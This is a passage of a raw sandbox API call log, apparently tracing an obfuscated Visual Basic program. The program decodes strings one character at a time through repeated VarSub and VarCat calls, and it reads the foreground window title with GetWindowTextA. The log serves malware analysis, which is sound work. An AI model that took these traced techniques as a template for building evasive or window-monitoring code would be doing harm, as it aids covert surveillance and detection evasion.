returned 0x0 [0177.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.801] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.801] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.801] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.802] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.802] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.803] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.803] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.804] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.804] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.805] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.805] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.806] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.806] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.807] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.807] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.808] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.808] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.809] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.809] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.810] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.810] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.811] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.811] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.811] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.812] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.812] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.813] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.813] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.814] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.814] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.814] GetForegroundWindow () returned 0x10162 [0177.817] GetLastError () returned 0x0 [0177.817] SysStringLen (param_1=" ") returned 0xff [0177.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.817] SysStringLen (param_1=" ") returned 0xff [0177.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.818] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.831] GetLastError () returned 0x0 [0177.832] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0177.832] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0177.832] SysStringLen (param_1="Blan") returned 0x4 [0177.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blan", cchWideChar=5, lpMultiByteStr=0x116863c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blan", lpUsedDefaultChar=0x0) returned 5 [0177.833] SetWindowTextA (hWnd=0x103c4, lpString="Blan") returned 1 [0177.833] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0177.833] GetFocus () returned 0x0 [0177.837] lstrlenA (lpString="Blan") returned 4 [0177.837] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0177.846] IsWindow (hWnd=0x103c4) returned 1 [0177.846] IsWindow (hWnd=0x103c4) returned 1 [0177.847] IsWindow (hWnd=0x103c4) returned 1 [0177.847] IsWindow (hWnd=0x103c4) returned 1 [0177.847] GetFocus () returned 0x0 [0177.851] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0177.851] GetFocus () returned 0x0 [0177.970] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0177.971] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0177.971] GetFocus () returned 0x0 [0177.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0177.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blan", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=5 | out: lpWideCharStr="Blan") returned 5 [0177.971] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.971] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0177.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.973] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0177.973] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.973] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0177.973] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.974] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.974] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.975] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.975] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.976] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.976] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.977] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.977] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.978] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.978] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.978] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.979] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.979] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.980] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.985] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.985] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.986] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.986] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.986] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.987] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.987] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.987] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.988] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.988] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.989] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.989] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.990] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.990] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 